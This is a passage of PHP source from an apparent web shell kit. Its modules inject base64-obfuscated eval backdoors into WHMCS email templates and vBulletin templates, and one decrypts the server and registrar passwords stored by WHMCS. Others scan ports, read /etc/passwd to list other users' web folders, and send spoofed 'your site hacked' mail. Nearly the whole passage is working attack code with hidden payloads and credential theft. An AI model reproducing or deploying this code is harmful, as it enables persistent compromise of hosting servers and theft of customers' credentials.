2968. <tr><td><font face='Arial' color='#FFFFFF'><b>Db Pass</b><br></font></td><td><input type=text name=dbp size='50' ></td/></tr>
2969. </table>
2970. <input type=submit value='>>'></form></center></td></tr></table></center>";
2971. if(isset($_POST['alfa6'])) {
2972. $dbu = $_POST['alfa6'];
2973. $dbn = $_POST['alfa7'];
2974. $dbp = $_POST['alfa8'];
2975. $dbh = $_POST['alfa9'];
2976. $index = "{php}eval(base64_decode('JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSWp4MGFYUnNaVDVUYjJ4bGRtbHphV0pzWlNCVmNHeHZZV1JsY2p3dmRHbDBiR1UrWEc0aU93MEtaV05vYnlBaVBDOW9aV0ZrUGx4dUlqc05DbVZqYUc4Z0lqeGliMlI1SUdKblkyOXNiM0k5SXpBd01EQXdNRDVjYmlJN0RRcGxZMmh2SUNJOFluSStYRzRpT3cwS1pXTm9ieUFpUEdObGJuUmxjajQ4Wm05dWRDQmpiMnh2Y2oxY0luZG9hWFJsWENJK1BHSStXVzkxY2lCSmNDQkJaR1J5WlhOeklHbHpQQzlpUGlBOFptOXVkQ0JqYjJ4dmNqMWNJbmRvYVhSbFhDSStQQzltYjI1MFBqd3ZZMlZ1ZEdWeVBpQmNiaUk3RFFwbFkyaHZJQ0k4WW1sblBqeGlhV2MrUEdadmJuUWdZMjlzYjNJOVhDSWpOME5HUXpBd1hDSStQR05sYm5SbGNqNWNiaUk3RFFwbFkyaHZJQ1JmVTBWU1ZrVlNXeWRTUlUxUFZFVmZRVVJFVWlkZE93MEtaV05vYnlBaVBDOWpaVzUwWlhJK1BDOW1iMjUwUGp3dllUNDhabTl1ZENCamIyeHZjajFjSWlNM1EwWkRNREJjSWo1Y2JpSTdEUXBsWTJodklDSThZbkkrWEc0aU93MEtaV05vYnlBaVBHSnlQbHh1SWpzTkNtVmphRzhnSWp4alpXNTBaWEkrUEdadmJuUWdZMjlzYjNJOVhDSWpOME5HUXpBd1hDSStQR0pwWno0OFltbG5QbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaQ0JCY21WaFBDOWlhV2MrUEM5bWIyNTBQand2WVQ0OFptOXVkQ0JqYjJ4dmNqMWNJaU0zUTBaRE1EQmNJajQ4TDJadmJuUStQQzlqWlc1MFpYSStQR0p5UGx4dUlqc05DbVZqYUc4Z0p6eGpaVzUwWlhJK1BHWnZjbTBnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSWdaVzVqZEhsd1pUMGliWFZzZEdsd1lYSjBMMlp2Y20wdFpHRjBZU0lnYm1GdFpUMGlkWEJzYjJGa1pYSWlJQTBLYVdROUluVndiRzloWkdWeUlqNG5PdzBLSUdWamFHOGdKenhwYm5CMWRDQjBlWEJsUFNKbWFXeGxJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0kwTlNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlIUjVjR1U5SW5OMVltMXBkQ0lnRFFwcFpEMGlYM1Z3YkNJZ2RtRnNkV1U5SWxWd2JHOWhaQ0krUEM5bWIzSnRQand2WTJWdWRHVnlQaWM3RFFvZ2FXWW9JQ1JmVUU5VFZGc25YM1Z3YkNkZElEMDlJQ0pWY0d4dllXUWlJQ2tnZXcwS0lHbG1LRUJqYjNCNUtDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhTd2dKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdJR1ZqYUc4Z0RRb25QR0krUEdadmJuUWdZMjlzYjNJOVhDSWpOME5HUXpBd1hDSStQR05sYm5SbGNqNVZjR3h2WVdRZ1UzVmpZMlZ6YzJaMWJHeDVJRHNwUEM5bWIyNTBQand2WVQ0OFptOXVkQ0JqYjJ4dmNqMWNJaU0zUTBaRE1EQmNJajQ4TDJJK1BHSnlQanhpY2o0bk95QjlEUW9nSUNBZ0lHVnNjMlVnZXlCbFkyaHZJQ2M4WWo0OFptOXVkQ0JqYjJ4dmNqMWNJaU0zUTBaRE1EQmNJajQ4WTJWdWRHVnlQbFZ3Ykc5aFpDQm1ZV2xzWldRZ09pZzhMMlp2Ym5RK1BDOWhQanhtYjI1MElHTnZiRzl5UFZ3aUl6ZERSa013TUZ3aVBqd3ZZajROQ2p4aWNqNDhZbkkrSnpzZ2ZRMEtJSDBOQ2o4K0RRbzhZMlZ1ZEdWeVBqeHpjR0Z1SUhOMGVXeGxQU0ptYjI1MExYTnBlbVU2TXpCd2VEc2lQanh6Y0dGdUlITjBlV3hsUFNKaVlXTnJaM0p2ZFc1a09pQjFjbXdvSm5GMWIzUTdhSFIwY0RvdkwzVndMbWx5WVc0dGRHRnNheTVwY2k5MWNHeHZZV1J6THpFek16RTFOekV4TkRrekxtZHBaaVp4ZFc5ME95a2djbVZ3WldGMExYZ2djMk55YjJ4c0lEQWxJREFsSUhSeVlXNXpjR0Z5Wlc1ME95QmpiMnh2Y2pvZ2NtVmtPeUIwWlhoMExYTm9ZV1J2ZHpvZ09IQjRJRGh3ZUNBeE0zQjRPeUkrUEhOMGNtOXVaejQ4WWo0OFltbG5Qbk52YkdWMmFYTnBZbXhsUUdkdFlXbHNMbU52YlR3dllqNDhMMkpwWno0OEwzTjBjbTl1Wno0TkNnPT0iKTsNCiRzb2xldmlzaWJsZSA9IGZvcGVuKCJzb2xldmlzaWJsZS5waHAiLCJ3Iik7DQpmd3JpdGUoJHNvbGV2aXNpYmxlLCR4KTs='));{/php}";
2977. $newin = str_replace("'","\'",$index);
2978. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2979. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index))
2980. {
2981. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
2982. mysql_select_db($dbn) or die(mysql_error());
2983. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE id='37'";
2984. $result = mysql_query($inject) or die (mysql_error());
2985. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2986. $result2 = mysql_query($create) or die (mysql_error());
2987. echo '<script>alert("shell injectet :\)")</script>';
2988. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" http://target.com/whmcs/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" http://target.com/whmcs/solevisible.php \"</font></b></center><br><br>";
2989. }
2990. }
2991. }
2992. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'decoder'))
2993. {
2994. function decrypt ($string,$cc_encryption_hash)
2995. {
2996. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
2997. $hash_key = _hash ($key);
2998. $hash_length = strlen ($hash_key);
2999. $string = base64_decode ($string);
3000. $tmp_iv = substr ($string, 0, $hash_length);
3001. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
3002. $iv = $out = '';
3003. $c = 0;
3004. while ($c < $hash_length)
3005. {
3006. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
3007. ++$c;
3008. }
3009. $key = $iv;
3010. $c = 0;
3011. while ($c < strlen ($string))
3012. {
3013. if (($c != 0 AND $c % $hash_length == 0))
3014. {
3015. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
3016. }
3017. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
3018. ++$c;
3019. }
3020. return $out;
3021. }
3022. function _hash ($string)
3023. {
3024. if (function_exists ('sha1'))
3025. {
3026. $hash = sha1 ($string);
3027. }
3028. else
3029. {
3030. $hash = md5 ($string);
3031. }
3032. $out = '';
3033. $c = 0;
3034. while ($c < strlen ($hash))
3035. {
3036. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
3037. $c += 2;
3038. }
3039. return $out;
3040. }
3041. echo "<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_=\"\";</script>
3042. <center>
3043. <FORM action='' method='post' onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
3044. <input type='hidden' name='form_action' value='2'>
3045. <table border=1>
3046. <center><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">WHMCS</font> <font color=\"#FFFFFF\">De</font><font color=\"#FF0000\">Coder</font><font color=\"#FFFF01\"> ==</font></b></center><br>
3047. <tr><td><font color=\"#FFFFFF\"><b>db_host : </b></font></td><td><input type='text' size='50' name='db_host' value='localhost'></td></tr>
3048. <tr><td><font color=\"#FFFFFF\"><b>db_username : </b></font></td><td><input type='text' size='50' name='db_username' value=''></td></tr>
3049. <tr><td><font color=\"#FFFFFF\"><b>db_password : </b></font></td><td><input type='text' size='50' name='db_password' value=''></td></tr>
3050. <tr><td><font color=\"#FFFFFF\"><b>db_name : </b></font></td><td><input type='text' size='50' name='db_name' value=''></td></tr>
3051. <tr><td><font color=\"#FFFFFF\"><b>cc_encryption_hash : </b></font></td><td><input type='text' size='50' name='cc_encryption_hash' value=''></td></tr>
3052. </table>
3053. <INPUT class=submit type='submit' value='>>' name='Submit'>
3054. </FORM>
3055. </center>";
3056. if($_POST['alfa1'] == 2 && $_POST['alfa3'])
3057. {
3058. $db_host=($_POST['alfa7']);
3059. $db_username=($_POST['alfa3']);
3060. $db_password=($_POST['alfa4']);
3061. $db_name=($_POST['alfa5']);
3062. $cc_encryption_hash=($_POST['alfa6']);
3063. echo '<br><pre id="strOutput" style="margin-top:5px" class="ml1"><br>';
3064. $link=mysql_connect($db_host,$db_username,$db_password) or die(mysql_error());
3065. mysql_select_db($db_name,$link) ;
3066. $query = mysql_query("SELECT * FROM tblservers");
3067. $num = mysql_num_rows($query);
3068. if ($num > 0){
3069. for($i=0; $i <=$num -1; $i++){
3070. $v = mysql_fetch_array($query);
3071. $ipaddress = $v['ipaddress'];
3072. $username = $v['username'];
3073. $type = $v['type'];
3074. $active = $v['active'];
3075. $hostname = $v['hostname'];
3076. echo("<center><table border='1'>");
3077. $password = decrypt ($v['password'], $cc_encryption_hash);
3078. echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
3079. echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
3080. echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
3081. echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
3082. echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
3083. echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
3084. echo "</table><br><br></center>";
3085. }
3086. $query1 = mysql_query("SELECT * FROM tblregistrars");
3087. $num1 = mysql_num_rows($query1);
3088. if ($num1 > 0){
3089. for($i=0; $i <=$num1 -1; $i++){
3090. $v = mysql_fetch_array($query1);
3091. $registrar = $v['registrar'];
3092. $setting = $v['setting'];
3093. $value = decrypt ($v['value'], $cc_encryption_hash);
3094. if ($value=="") {
3095. $value=0;
3096. }
3097. echo("<center>Domain Reseller <br><center>");
3098. echo("<center><table border='1'>");
3099. echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
3100. echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
3101. echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
3102. echo "</table><br><br></center>";
3103. }
3104. }
3105. }
3106. }
3107. }
3108. echo "</div>";
3109. alfafooter();
3110. }
3111. function alfaVbinject(){
3112. alfahead();
3113. echo '<div class=header>';
3114. echo '<script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_=alfa6_=\"\";</script>
3115. <center><br><br><b><font color="#FFFF01">==</font> <font color="#00A220">vBulletin</font> <font color="#FFFFFF">Shell</font> <font color="#FF0000">Injector</font><font color="#FFFF01"> ==</font></b></font>
3116. <form name="frm" action="" method="POST" onsubmit="g(null,null,this.template.value,this.lo.value,this.db.value,this.user.value,this.pass.value,this.tab.value); return false;">
3117. <br>
3118. <font color="#FFFFFF"><b>Inject To : </b></font><br><select size="1" name="template">
3119. <option value="FAQ">faq.php</option>
3120. <option value="FORUMHOME">FORUMHOME</option>
3121. <option value="search_forums">search forums</option>
3122. <option value="SHOWGROUPS">SHOWGROUPS</option>
3123. <option value="SHOWTHREAD">showthread.php</option>
3124. <option value="CALENDAR">calendar.php</option>
3125. <option value="MEMBERINFO">MEMBERINFO</option>
3126. <option value="footer">footer</option>
3127. <option value="header">header</option>
3128. <option value="headinclude">headinclude</option>
3129. <option value="lostpw">lostpw</option>
3130. <option value="memberlist">memberlist</option></select></p>
3131. <table border=1>
3132. <tr><td><font color="#FFFFFF"><b>Host : </b></font></td><td><input name=\'lo\' type=\'text\' value=\'localhost\' size=\'30\'></td></tr>
3133. <tr><td><font color="#FFFFFF"><b>DataBase Name : </b></font></td><td><input type=\'text\' size=\'30\' name=\'db\' value=\'\'></td></tr>
3134. <tr><td><font color="#FFFFFF"><b>User Name : </b></font></td><td><input type=\'text\' size=\'30\' name=\'user\' value=\'\'></td></tr>
3135. <tr><td><font color="#FFFFFF"><b>Password : </b></font></td><td><input type=\'text\' size=\'30\' name=\'pass\' value=\'\'></td></tr>
3136. <tr><td><font color="#FFFFFF"><b>Table Prefix : </b></font></td><td><input type=\'text\' size=\'30\' name=\'tab\' value=\'\'></td></tr>
3137. </table>
3138. <br><input type="submit" value=">>"/>
3139. </form></center>';
3140. if($_POST['alfa5']){
3141. $code = "{\${eval(base64_decode(\'JGNvZGUgPSAnUEQ5d2FIQU5DbVZqYUc4Z0lqeDBhWFJzWlQ1VGIyeGxkbWx6YVdKc1pTQlZjR3h2WVdSbGNqd3ZkR2wwYkdVK1hHNGlPdzBLWldOb2J5QWlQQzlvWldGa1BseHVJanNOQ21WamFHOGdJanhpYjJSNUlHSm5ZMjlzYjNJOUl6QXdNREF3TUQ1Y2JpSTdEUXBsWTJodklDSThZbkkrWEc0aU93MEtaV05vYnlBaVBHTmxiblJsY2o0OFptOXVkQ0JqYjJ4dmNqMWNJbmRvYVhSbFhDSStQR0krV1c5MWNpQkpjQ0JCWkdSeVpYTnpJR2x6UEM5aVBpQThabTl1ZENCamIyeHZjajFjSW5kb2FYUmxYQ0krUEM5bWIyNTBQand2WTJWdWRHVnlQaUJjYmlJN0RRcGxZMmh2SUNJOFltbG5QanhpYVdjK1BHWnZiblFnWTI5c2IzSTlYQ0lqTjBOR1F6QXdYQ0krUEdObGJuUmxjajVjYmlJN0RRcGxZMmh2SUNSZlUwVlNWa1ZTV3lkU1JVMVBWRVZmUVVSRVVpZGRPdzBLWldOb2J5QWlQQzlqWlc1MFpYSStQQzltYjI1MFBqd3ZZVDQ4Wm05dWRDQmpiMnh2Y2oxY0lpTTNRMFpETURCY0lqNWNiaUk3RFFwbFkyaHZJQ0k4WW5JK1hHNGlPdzBLWldOb2J5QWlQR0p5UGx4dUlqc05DbVZqYUc4Z0lqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0lqTjBOR1F6QXdYQ0krUEdKcFp6NDhZbWxuUGxOdmJHVjJhWE5wWW14bElGVndiRzloWkNCQmNtVmhQQzlpYVdjK1BDOW1iMjUwUGp3dllUNDhabTl1ZENCamIyeHZjajFjSWlNM1EwWkRNREJjSWo0OEwyWnZiblErUEM5alpXNTBaWEkrUEdKeVBseHVJanNOQ21WamFHOGdKenhqWlc1MFpYSStQR1p2Y20wZ1lXTjBhVzl1UFNJaUlHMWxkR2h2WkQwaWNHOXpkQ0lnWlc1amRIbHdaVDBpYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNJZ2JtRnRaVDBpZFhCc2IyRmtaWElpSUEwS2FXUTlJblZ3Ykc5aFpHVnlJajRuT3cwS0lHVmphRzhnSnp4cGJuQjFkQ0IwZVhCbFBTSm1hV3hsSWlCdVlXMWxQU0ptYVd4bElpQnphWHBsUFNJME5TSStQR2x1Y0hWMElHNWhiV1U5SWw5MWNHd2lJSFI1Y0dVOUluTjFZbTFwZENJZ0RRcHBaRDBpWDNWd2JDSWdkbUZzZFdVOUlsVndiRzloWkNJK1BDOW1iM0p0UGp3dlkyVnVkR1Z5UGljN0RRb2dhV1lvSUNSZlVFOVRWRnNuWDNWd2JDZGRJRDA5SUNKVmNHeHZZV1FpSUNrZ2V3MEtJR2xtS0VCamIzQjVLQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25kRzF3WDI1aGJXVW5YU3dnSkY5R1NVeEZVMXNuWm1sc1pTZGRXeWR1WVcxbEoxMHBLU0I3SUdWamFHOGdEUW9uUEdJK1BHWnZiblFnWTI5c2IzSTlYQ0lqTjBOR1F6QXdYQ0krUEdObGJuUmxjajVWY0d4dllXUWdVM1ZqWTJWemMyWjFiR3g1SURzcFBDOW1iMjUwUGp3dllUNDhabTl1ZENCamIyeHZjajFjSWlNM1EwWkRNREJjSWo0OEwySStQR0p5UGp4aWNqNG5PeUI5RFFvZ0lDQWdJR1ZzYzJVZ2V5QmxZMmh2SUNjOFlqNDhabTl1ZENCamIyeHZjajFjSWlNM1EwWkRNREJjSWo0OFkyVnVkR1Z5UGxWd2JHOWhaQ0JtWVdsc1pXUWdPaWc4TDJadmJuUStQQzloUGp4bWIyNTBJR052Ykc5eVBWd2lJemREUmtNd01Gd2lQand2WWo0TkNqeGljajQ4WW5JK0p6c2dmUTBLSUgwTkNqOCtEUW84WTJWdWRHVnlQanh6Y0dGdUlITjBlV3hsUFNKbWIyNTBMWE5wZW1VNk16QndlRHNpUGp4emNHRnVJSE4wZVd4bFBTSmlZV05yWjNKdmRXNWtPaUIxY213b0puRjFiM1E3YUhSMGNEb3ZMM1Z3TG1seVlXNHRkR0ZzYXk1cGNpOTFjR3h2WVdSekx6RXpNekUxTnpFeE5Ea3pMbWRwWmlaeGRXOTBPeWtnY21Wd1pXRjBMWGdnYzJOeWIyeHNJREFsSURBbElIUnlZVzV6Y0dGeVpXNTBPeUJqYjJ4dmNqb2djbVZrT3lCMFpYaDBMWE5vWVdSdmR6b2dPSEI0SURod2VDQXhNM0I0T3lJK1BITjBjbTl1Wno0OFlqNDhZbWxuUG5OdmJHVjJhWE5wWW14bFFHZHRZV2xzTG1OdmJUd3ZZajQ4TDJKcFp6NDhMM04wY205dVp6NE5DZz09JzsgJGZwID0gZm9wZW4oInNvbGV2aXNpYmxlLnBocCIsIncrIik7IGZ3cml0ZSgkZnAsYmFzZTY0X2RlY29kZSgkY29kZSkpOyBoZWFkZXIoIkxvY2F0aW9uOiBzb2xldmlzaWJsZS5waHAiKTs=\'))}}{\${exit()}}&";
3142. $template =$_POST['alfa1'];
3143. @mysql_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5']) or die(mysql_error());
3144. @mysql_select_db($_POST['alfa3']) or die(mysql_error());
3145. $p = "UPDATE ".$_POST['alfa6']."template SET template ='".$code."' WHERE title ='".$template."'";
3146. $ka= @mysql_query($p) or die(mysql_error());
3147. if ($ka){echo"<script>alert('Shell Injected in $template')</script>";}
3148. }
3149. echo "</div>";
3150. alfafooter();
3151. }
3152. function alfaportscanner(){
3153. alfahead();
3154. echo '<div class=header><script>alfa2_=alfa3_=alfa4_="";</script><center><br><b><font color="#FFFFFF">Port Scaner<font></b><br>
3155. <br><br><form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
3156. <input type="hidden" name="y" value="phptools">
3157. <b><font color="#00A220"> Host: <br /><br />
3158. <input id="text" type="text" style="color:#FF0000;background-color:#000000" name="host" value="localhost"/><br /><br />
3159. <b><font id="text" color="#FFFFFF"> Port start: <br />
3160. <input id="text" type="text" style="color:#FF0000;background-color:#000000" name="start" value="0"/><br /><br />
3161. <b><font color="#FF0000"> Port end: <br />
3162. <input id="text" type="text" style="color:#FF0000;background-color:#000000" name="end" value="1000"/><br /><br />
3163. <input type="submit" value=">>" />
3164. </form></center><br><br>
3165. ';
3166. $start = strip_tags($_POST['alfa2']);
3167. $end = strip_tags($_POST['alfa3']);
3168. $host = strip_tags($_POST['alfa4']);
3169. if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
3170. echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br/>';
3171. for($i = $start; $i<=$end; $i++){
3172. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
3173. if($fp){
3174. echo "<center>Port <font style='color:#DE3E3E'>$i</font> is <font style='color:#64CF40'>open</font></br></center>";
3175. }
3176. flush();
3177. }
3178. }
3179. echo '</div>';
3180. alfafooter();
3181. }
3182. function alfabasedir(){
3183. alfahead();
3184. echo '<div class=header>';
3185. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
3186. set_time_limit(0);
3187. @$passwd = fopen('/etc/passwd','r');
3188. if (!$passwd) { die('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>'); }
3189. $pub = array();
3190. $users = array();
3191. $conf = array();
3192. $i = 0;
3193. while(!feof($passwd))
3194. {
3195. $str = fgets($passwd);
3196. if ($i > 35)
3197. {
3198. $pos = strpos($str,':');
3199. $username = substr($str,0,$pos);
3200. $dirz = '/home/'.$username.'/public_html/';
3201. if (($username != ''))
3202. {
3203. if (is_readable($dirz))
3204. {
3205. array_push($users,$username);
3206. array_push($pub,$dirz);
3207. }
3208. }
3209. }
3210. $i++;
3211. }
3212. echo '<br><br>';
3213. echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font></b>";
3214. echo "<b><font color=\"#FFFFFF\">[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font></b>";
3215. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
3216. foreach ($users as $user)
3217. {
3218. $path = "/home/$user/public_html/";
3219. echo "<form method=post onsubmit='g('FilesMan',this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
3220. }
3221. echo '<br><br></b>';
3222. echo '</div>';
3223. alfafooter();
3224. }
3225. function alfamail(){
3226. alfahead();
3227. echo '<div class=header><br><br>';
3228. echo '
3229. <script>alfa1_=alfa2_=alfa3_=alfa4_=alfa5_="";</script>
3230. <center><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,this.mail_send.value,this.mail_content.value); return false;">
3231. <table border=1>
3232. <tr>
3233. <td>
3234. <font color="#00A220"><b>mail to : </b></font></td><td><input placeholder="target" size="30" type="text" name="mail_to" />
3235. </td>
3236. </tr>
3237. <tr>
3238. <td>
3239. <font color="#ffffff"><b>from : </b></font></td><td><input type="text" size="30" placeholder="solevisible@gmail.com" name="mail_from" />
3240. </td>
3241. </tr>
3242. <tr>
3243. <td>
3244. <font color="#FF0000"><b>subject : </b></font></td><td><input type="text" size="30" value="your site hacked by me" name="mail_subject" />
3245. </td>
3246. </tr>
3247. </table><br>
3248. <textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea>
3249. <br><input type="submit" value=">>" name="mail_send" />
3250. </form></center><br><br></div>';
3251. alfafooter();
3252. if(isset($_POST['alfa4']) && ($_POST['alfa4'] == '>>'))
3253. {
3254. $mail_to = $_POST['alfa1'];
3255. $mail_from = $_POST['alfa2'];
3256. $mail_subject = $_POST['alfa3'];
3257. $mail_content = $_POST['alfa5'];
3258. if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from"))
3259. { echo '<script>alert(\'mail sended\')</script>'; }
3260. else echo '<script>alert(\'failed\')</script>';
3261. }
3262. }
3263. function alfaziper(){
3264. alfahead();
3265. echo '<div class=header>';
3266. if (class_exists('ZipArchive')){
3267. echo '
3268. <script>alfa1_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_="";</script>
3269. <center>
3270. <br /><br />
3271. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,this.ziper.value);return false;" method="post">
3272. <font color="#FFFFFF"><b>Dir:</b> </font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/><br /><br />
3273. <font color="#FFFFFF"><b>Save Dir: </b></font><input type="text" name="zipfile" value="alfa.zip" size="60"/><br /><br />
3274. <input type="submit" value=">>" name="ziper" /> <br /><br />
3275. </form></center>
3276. ';
3277. $code = base64_decode('ICAgIGlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykgfHwgIWZpbGVfZXhpc3RzKCRzb3VyY2UpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkemlwID0gbmV3IFppcEFyY2hpdmUoKTsNCiAgICBpZiAoISR6aXAtPm9wZW4oJGRlc3RpbmF0aW9uLCBaSVBBUkNISVZFOjpDUkVBVEUpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkc291cmNlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCByZWFscGF0aCgkc291cmNlKSk7DQoNCiAgICBpZiAoaXNfZGlyKCRzb3VyY2UpID09PSB0cnVlKQ0KICAgIHsNCiAgICAgICAgJGZpbGVzID0gbmV3IFJlY3Vyc2l2ZUl0ZXJhdG9ySXRlcmF0b3IobmV3IFJlY3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG9yKCRzb3VyY2UpLCBSZWN1cnNpdmVJdGVyYXRvckl0ZXJhdG9yOjpTRUxGX0ZJUlNUKTsNCg0KICAgICAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpDQogICAgICAgIHsNCiAgICAgICAgICAgICRmaWxlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCAkZmlsZSk7DQoNCiAgICAgICAgICAgIC8vIElnbm9yZSAiLiIgYW5kICIuLiIgZm9sZGVycw0KICAgICAgICAgICAgaWYoIGluX2FycmF5KHN1YnN0cigkZmlsZSwgc3RycnBvcygkZmlsZSwgJy8nKSsxKSwgYXJyYXkoJy4nLCAnLi4nKSkgKQ0KICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KDQogICAgICAgICAgICAkZmlsZSA9IHJlYWxwYXRoKCRmaWxlKTsNCg0KICAgICAgICAgICAgaWYgKGlzX2RpcigkZmlsZSkgPT09IHRydWUpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHppcC0+YWRkRW1wdHlEaXIoc3RyX3JlcGxhY2UoJHNvdXJjZSAuICcvJywgJycsICRmaWxlIC4gJy8nKSk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChpc19maWxlKCRmaWxlKSA9PT0gdHJ1ZSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkemlwLT5hZGRGcm9tU3RyaW5nKHN0cl9yZXBsYWNlKCRzb3VyY2UgLiAnLycsICcnLCAkZmlsZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZSBpZiAoaXNfZmlsZSgkc291cmNlKSA9PT0gdHJ1ZSkNCiAgICB7DQogICAgICAgICR6aXAtPmFkZEZyb21TdHJpbmcoYmFzZW5hbWUoJHNvdXJjZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRzb3VyY2UpKTsNCiAgICB9DQoNCiAgICByZXR1cm4gJHppcC0+Y2xvc2UoKTs=');
3278. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>'))
3279. {
3280. $newfunc = create_function('$source,$destination', $code);
3281. $dirzip = $_POST['alfa3'];
3282. $zipfile = $_POST['alfa4'];
3283. if($newfunc($dirzip, $zipfile)){
3284. echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/><center><b><b><font color="#FFFF01">==</font> <font color="#00A220">File or</font> <font color="#FFFFFF">Directory</font> <font color="#FF0000">Ziped</font><font color="#FFFF01"> ==</font></b>
3285. </b></center>';
3286. }else {echo '<pre id="strOutput" style="margin-top:8px" class="ml1"><br/><center><b>ERROR!!!...</b><center><br><br>';}
3287. }
3288. }
3289. else {
3290. echo '
3291. <script>alfa1_=alfa3_=alfa4_=alfa5_=alfa6_=alfa7_="";</script>
3292. <center>
3293. <br /><br />
3294. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,this.ziper.value);return false;" method="post">
3295. Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/><br /><br />
